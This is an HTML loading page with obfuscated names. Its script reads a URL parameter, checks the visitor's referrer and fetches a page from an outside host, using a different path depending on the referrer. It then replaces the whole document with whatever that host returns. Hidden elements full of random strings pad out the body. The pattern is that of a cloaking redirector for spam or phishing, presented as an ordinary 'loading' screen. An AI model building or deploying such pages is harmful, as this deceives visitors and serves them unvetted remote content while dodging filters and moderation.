<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YejPVy {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YejPVy .ErCclzJuToo {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YejPVy .content {
            line-height: 50px;
            text-align: center
        }

        .YejPVy .img {
            width: 100%
        }

        .YejPVy .OO5CCz7HG {
            text-align: center
        }

        .YejPVy .OO5CCz7HG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YejPVy .OO5CCz7HG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YejPVy .OO5CCz7HG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YejPVy .OO5CCz7HG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YejPVy .OO5CCz7HG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YejPVy .OO5CCz7HG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YejPVy .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function lNza9MO8O4Ce(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var FsjGrFF = lNza9MO8O4Ce('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ FsjGrFF +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ FsjGrFF +".html?a=share";
		}
		
        gNhOINd=url+"#"+new Date().getTime();
        gNhOINd && function() {
            $.get(gNhOINd, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<h1 style='display:none' >WvH50rz7ZzvriiC944W9CvuDN2XIEgAQyKcCT286lcHP0sHDkwuNpuN</h1>
<b style='display:none' >Z3Ycn4eQHhBfOxFoFmOflHpm8y1w8c2yLHJQNzm6gIgyoyVMO4TjocTSsrlARXG</b>
<img  src='' style='display:none'>
<div style='display:none'>cEne8padzYAVi5SnDe7N5lqO52okiaWq8FoLaPo3NZKNndEvObzd9se5BrQNVqkz7p0</div>
<p  style='display:none'>L0uroE9jSfqcqpW1FATe3tAmT1ik25UldC4Qd</p>
<h1 style='display:none' >WvH50rz7ZzvriiC944W9CvuDN2XIEgAQyKcCT286lcHP0sHDkwuNpuN</h1>
<p  style='display:none'>L0uroE9jSfqcqpW1FATe3tAmT1ik25UldC4Qd</p>
<h1 style='display:none' >WvH50rz7ZzvriiC944W9CvuDN2XIEgAQyKcCT286lcHP0sHDkwuNpuN</h1><div class="YejPVy">
    <div class="ErCclzJuToo">
        <div class="OO5CCz7HG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >yWF49h0urOj6G5jLhCz8BoXfJf2WBiXWhe78IBmQDU8H1TwdTBKIryUQXLX8tUMdogK</ul>
<div style='display:none'>EFHmoS8A73MObq0h3UwqRpzJD8Yda17ablIWV7Bw9Wh</div>
<li style='display:none' >WVaAScwsCHMCm9AFGB9</li>
<img  src='' style='display:none'>
<b style='display:none' >sNbny8W080Lsfd2fmapC0hFdm9yyEBWrU</b>
<li style='display:none' >WVaAScwsCHMCm9AFGB9</li></body>
</html>